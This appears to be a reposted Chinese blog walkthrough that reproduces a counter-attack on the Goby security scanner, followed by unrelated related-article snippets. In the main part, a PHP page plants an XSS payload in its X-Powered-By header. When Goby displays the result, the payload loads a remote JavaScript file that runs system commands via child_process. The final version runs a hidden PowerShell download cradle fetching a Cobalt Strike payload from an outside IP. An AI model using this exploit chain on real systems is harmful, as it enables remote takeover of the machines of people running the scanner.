Goby反制复现

0x00 前言

最近复现Goby反制的时候遇到很多坑,记录一下反制过程以及遇到的坑点,还有世界上最强的黑客mux1ng帮我解决了很多问题。

0x01环境

攻击机:
windows10 
Goby1.8.230
172.20.10.3反制机:
Windows7
Phpstudy2016
172.20.10.14

0x02步骤

1、再反制机上开启一个php服务,然后制作一个index.php页面,img标签里的空格要用tab去代替

index.php内容:
<?php
header("X-Powered-By: PHP/<img	src=1	onerror=alert(/s/)>");
?>
<head>
<title>TEST</title>
</head>
<body>
testtest
</body>
</html>

2、通过攻击机上的goby去扫描,然后点开该IP的详细即可弹窗
在这里插入图片描述

在这里插入图片描述

3、接下来就可以通过加载js来执行命令了,制作1.js文件

index.php内容改成
<?php
header("X-Powered-By: PHP/<img	src=1	onerror=import(unescape('http%3A//172.20.10.14/1.js'))>");
?>
<head>
<title>TEST</title>
</head>
<body>
testtest
</body>
</html>1.js内容为
(function(){
require('child_process').exec('calc.exe');
})();

4、更改完index.php和1.js之后,再次使用goby去扫描该IP,点开详情后可弹计算机出来

在这里插入图片描述
在这里插入图片描述

5、最后就吧calc.exe替换cs上线的命令即可上线cs了

index.php内容改成
<?php
header("X-Powered-By: PHP/<img	src=1	onerror=import(unescape('http%3A//172.20.10.14/1.js'))>");
?>
<head>
<title>TEST</title>
</head>
<body>
testtest
</body>
</html>1.js内容为
(function(){
require('child_process').exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://43.129.206.184:80/a\'))"');
})();

在这里插入图片描述
在这里插入图片描述

0x03遇到的问题

1、使用phpstudy启动的时候一定要选择nginx+php
2、当更改完1.js内容之后一定要关闭goby,然后重新再打开goby去扫描,因为goby有缓存,所以不重新打开可能不会加载1.js
3、require('child_process').exec()里的上线cs命令的时候一定要用反斜杠(\)要把单引号给转义一下,不然上线cs可能有点问题

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/358048.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

测试双重图案

前段时间&#xff0c;我写了一篇有关使用Test Double的后果的文章&#xff0c;但是与Test Double Patterns无关&#xff0c;仅是一个简单的清单。 今天&#xff0c;我想对其进行更改&#xff0c;并解释这些模式之间的差异。 正如我在提到的文章中写道&#xff1a; Test Doubl…

javaScript学习笔记之比较运算符||逻辑运算符||条件运算符(三目运算符)

比较运算符在逻辑语句中使用,以测定变量或值是否相等。 逻辑运算符用于测定变量或值之间的逻辑。 javaScript基于某些条件对变量进行赋值的条件运算符(三目运算符)。 HTML: <!DOCTYPE html> <html> <head><meta charset="utf-8"><title…

类的依赖注入

http://www.360doc.com/content/14/0421/09/10504424_370757998.shtml转载于:https://www.cnblogs.com/changbaishan/p/4949225.html

JDK 9:模块系统状态的重点

马克雷因霍尔德 &#xff08; Mark Reinhold &#xff09;的“模块系统状态 &#xff08;SOMS&#xff09;”已于本月初发布&#xff0c;它提供了信息丰富的可读性“对项目Jigsaw中原型的Java SE平台进行了增强的非正式概述&#xff0c;并被提议作为JSR 376的起点。” 在这篇文…

fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御

一.编辑器漏洞 1.编辑器 编辑器属于第三方软件&#xff0c;它的作用是方便网站管理员上传或编辑网站上的内容&#xff0c;类似我们电脑上的Word文档。 编辑器通常分为两种情况&#xff1a; (1) 不需要后台验证&#xff0c;可以直接在前台访问且操作。通过方法找到编辑器&#x…

java学习笔记之条件语句(if...else)

条件语句用于基于不同的条件来执行不同的动作。 通常在写代码时,您总是需要为不同的决定来执行不同的动作。您可以在代码中使用条件语句来完成该任务。 在 JavaScript 中,我们可使用以下条件语句: if 语句 - 只有当指定条件为 true 时,使用该语句来执行代码if...else 语句 …

iOS 学习之NSPredicate

电话号码验证表达式 (BOOL)validateMobile:(NSString *)mobileNum { /** * 手机号码 * 移动&#xff1a;134[0-8],135,136,137,138,139,150,151,157,158,159,182,187,188 * 联通&#xff1a;130,131,132,152,155,156,185,186 * 电信&#xff1a;133,1349,153,180,189 */ NSStr…

javaScript学习笔记之break 和 continue 语句对比

break 语句用于跳出循环。 continue 用于跳过循环中的一个迭代。 break 语句可用于跳出循环。 break 语句跳出循环后,会继续执行该循环之后的代码(如果有的话): continue 语句中断循环中的迭代,如果出现了指定的条件,然后继续循环中的下一个迭代。 代码: <!DOCTYPE …

畅捷通T+任意文件上传(CNVD-2022-60632 )漏洞复现

一、漏洞描述 2022年8月29日和8月30日&#xff0c;畅捷通公司紧急发布安全补丁修复了畅捷通T软件任意文件上传漏洞。未经身份认证的攻击者利用该漏洞&#xff0c;通过绕过系统鉴权&#xff0c;在特定配置环境下实现任意文件的上传&#xff0c;从而执行任意代码&#xff0c;获得…

Spring 3使用JUnit 4进行测试– ContextConfiguration和AbstractTransactionalJUnit4SpringContextTests...

在Internet上寻找一种测试我的Spring 3应用程序的方法&#xff0c;我找到了许多描述如何使用JUnit测试应用程序的文章。 它们中的大多数都是不完整的示例&#xff0c;实际上并不起作用。 在这篇文章中&#xff0c;我将尝试填补这一空白&#xff0c;并撰写一篇简洁而简单的文章&…

RecyclerView滑动到底部自动加载

你经常听到“上拉加载”这样的字眼吗&#xff1f;你知道这个功能是怎么实现的吗&#xff1f;这篇文章记录了我对“上拉加载”的实现&#xff0c;与大家一起分享。 “上拉加载”针对的是RecyclerView或者Listview这样的列表控件&#xff08;本文以RecyclerView为例&#xff09;&…

javaScript学习笔记之typeof, null, 和 undefined之间的对比

typeof 操作符 你可以使用 typeof 操作符来检测变量的数据类型。 null 在 JavaScript 中 null 表示 "什么都没有"。 null是一个只有一个值的特殊类型。表示一个空对象引用。 undefined 在 JavaScript 中, undefined 是一个没有设置值的变量。 typeof 一个没有值的变量…

不喜欢节流吗?

您别无选择–基础系统&#xff08;此处的JVM将为您完成此选择&#xff09;。 我仍然记得2013年夏天&#xff0c;当时我正在运行一个项目&#xff0c;整个应用程序中只有1个URL使服务器瘫痪。 问题很简单-机器人决定以很高的速率索引我们的网站&#xff0c;并且该机器人正在创建…

OData V4 系列 查询操作

OData 学习目录 对OData的操作&#xff0c;主要是查询&#xff0c;下面把相关的查询情况列出来&#xff0c;供参考学习&#xff0c;每个操作都有对应的截图&#xff0c;便于理解 默认查询 $expand 查询导航属性关系 &#xff0c;查询Product相关的Supplier $top、$skip、$orde…

JSP项目打开不通的查看详情页动画是放大状态的解决办法

背景:前段时间做了一个详情页在当前页面的放大缩小的动画效果,——>我是如何用Jquery实现网页缩小放大的 今天测试反馈:详情页是缩小状态,点击关闭后打开其他的查看详情页页面,还是默认的缩小状态,需要做成,每次打开默认是放大的效果。 截图: 这个系统比较老,boots…

CentOS7--yum安装

1、创建yum文件夹 [roottester ~]# cd /usr/local/ [roottester local]# ls aegis bin etc games include lib lib64 libexec sbin share src [roottester local]# mkdir ./yum [roottester local]# cd yum2、下载yum源文件 http://mirrors.163.com/centos/7/os/x86…

单点登陆的三种实现方式

背景:单点登录(Single Sign On, SSO)是指在同一帐号平台下的多个应用系统中,用户只需登录一次,即可访问所有相互信任的应用系统。举例来说,百度贴吧和百度地图是百度公司旗下的两个不同的应用系统,如果用户在百度贴吧登录过之后,当他访问百度地图时无需再次登录,那么就…

gorm 密码字段隐藏_KeeWeb for mac(密码管理工具)

KeeWeb是一个非常专业的密码管理工具。这款工具支持Mac OS X&#xff0c;Windows和Linux平台&#xff0c;不需要任何安装和工作在所有现代浏览器&#xff0c;搜索任何条目或查看所有文件中的所有项目作为一个列表。功能非常强大实用。本站现在提供KeeWeb Mac版下载&#xff0c;…

zabbix主动、被动检测的详细过程与区别

最近项目再写采集器采集软件指标的功能&#xff0c;借此机会学习学习zabbix监控的一些知识。 http://www.ttlsa.com/zabbix/zabbix-active-and-passive-checks/ zabbix agent检测分为主动&#xff08;agent active&#xff09;和被动&#xff08;agent&#xff09;两种形式&…

Centos7下按装Docker和docker-compose及环境配置

删除之前安装的 sudo yum remove docker \docker-client \docker-client-latest \docker-common \docker-latest \docker-latest-logrotate \docker-logrotate \docker-selinux \docker-engine-selinux \docker-engineyum remove docker-ce docker-ce-selinux container-selin…